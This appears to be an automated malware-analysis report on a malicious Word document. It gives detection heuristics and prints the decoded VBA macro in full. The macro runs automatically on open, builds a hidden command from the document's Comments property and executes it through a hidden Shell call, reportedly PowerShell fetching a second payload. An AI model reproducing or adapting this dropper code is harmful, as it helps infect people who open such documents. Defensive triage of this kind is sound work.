MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and triggers the execution of a Shell() command, which in turn references PowerShell. This indicates the document is designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Macro.DollarShell-6346616-0' further supports this analysis.
Heuristics 8
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME VBA.Shell$ aBYsbtnzr, 0 End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() PinjEEHiY -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8542 bytes |
SHA-256: a9d608a226b560f4fcd0829005947a79efdced6f688c2a884428e875235c0f85 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
53 of 85 identifiers look randomly generated (e.g. 'jjHjqGFFpkh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub PinjEEHiY()
jjHjqGFFpkh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7400, 53)
RDcwVJIQWYI = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8122), 56)
GUzrRbJd = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12952), 58)
XBOoVJ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8757, 88)
MhtCsoCcsz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10381), 143)
HzYQAl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7748, 187)
FzHVnHAmvd = jjHjqGFFpkh + RDcwVJIQWYI + GUzrRbJd + XBOoVJ + MhtCsoCcsz + HzYQAl
LooiMwhF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2105, 91)
wojDWSGq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8848, 127)
CiFVWKYK = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8224), 7)
viwKu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7575), 35)
XiRrkhTIh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 216), 122)
iUpmE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5669), 104)
ciTLBZXl = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4461), 73)
PrZILnjLL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12249, 108)
AmMpGUf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4304), 61)
IiWmRc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17586, 112)
csTzMl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8680, 41)
iuShGatnFb = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16282), 97)
WvEskH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10671, 195)
UmribYiST = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10556), 66)
ASzcaNTGil = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1809), 134)
pjDohnbOF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11521, 181)
VrDjFi = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10917), 199)
UlnuoXTi = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2533), 37)
ArwlFBB = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1488, 88)
BfsEipKdk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15109), 53)
OYqLPvCm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7183, 131)
OJwzFUJ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2707), 151)
ChhwqvbjFF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8434, 184)
jHBDcBnWKwP = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14813), 180)
mVvHdUA = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6159), 83)
UvjZzQnOwjk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6992), 128)
BvudTWNbD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4686), 50)
fEZjZcli = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 13631), 192)
nFWCCXjwC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16714, 187)
vHUAMAAd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11289), 129)
QdItvrGo = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6847), 107)
GXuOpYaRzif = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6557), 31)
AjwEfMckA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15839), 78)
WbOIHf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13557), 42)
hoRYMF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13328, 25)
ZjiDrOuHJw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1001, 153)
csKGFjrN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14039, 51)
KTBXTuj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3053, 106)
wVXCBVOWH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18177), 27)
zItBf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4276), 177)
KSjOziHY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13127, 93)
vazUa = FzHVnHAmvd + LooiMwhF + wojDWSGq + CiFVWKYK + viwKu + XiRrkhTIh + iUpmE + ciTLBZXl + PrZILnjLL + AmMpGUf + IiWmRc + csTzMl + iuShGatnFb + WvEskH + UmribYiST + ASzcaNTGil + pjDohnbOF + VrDjFi + UlnuoXTi + ArwlFBB + BfsEipKdk + OYqLPvCm + OJwzFUJ + ChhwqvbjFF + jHBDcBnWKwP + mVvHdUA + UvjZzQnOwjk + BvudTWNbD + fEZjZcli + nFWCCXjwC + vHUAMAAd + QdItvrGo + GXuOpYaRzif + AjwEfMckA + WbOIHf + hoRYMF + ZjiDrOuHJw + csKGFjrN + KTBXTuj + wVXCBVOWH + zItBf + KSjOziHY
QapXlAbQi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10124, 56)
LChLu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9937, 36)
iGWwVRHT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10052), 15)
izwTfFH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18212, 47)
FZMbw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5959), 77)
ziDNPEnAw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15403), 190)
SFXPRv = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12513, 102)
lBljzaspbA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12663), 125)
azmUYQrBZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11795), 184)
WNzoMhpHRRK = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 673), 174)
MCFmWPLzf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4696, 103)
STDqADIMb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5879, 57)
IWLFi = vazUa + QapXlAbQi + LChLu + iGWwVRHT + izwTfFH + FZMbw + ziDNPEnAw + SFXPRv + lBljzaspbA + azmUYQrBZ + WNzoMhpHRRK + MCFmWPLzf + STDqADIMb
qbPWtdwHOIz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15774), 33)
zkFAqHYGf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9183), 40)
jOvUpwi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16161, 25)
EXrkPmio = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12955), 2)
KlFEoDZs = IWLFi + qbPWtdwHOIz + zkFAqHYGf + jOvUpwi + EXrkPmio
pihdSPdwKZZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9579, 5)
lDckUuT = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4010), 4)
okjjupwCM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16128), 4)
wKTVbW = KlFEoDZs + pihdSPdwKZZ + lDckUuT + okjjupwCM
skSkapXRiA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17115), 1)
zuiVozHNME = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 614, 1)
aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
VBA.Shell$ aBYsbtnzr, 0
End Sub
Sub AutoOpen()
PinjEEHiY
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.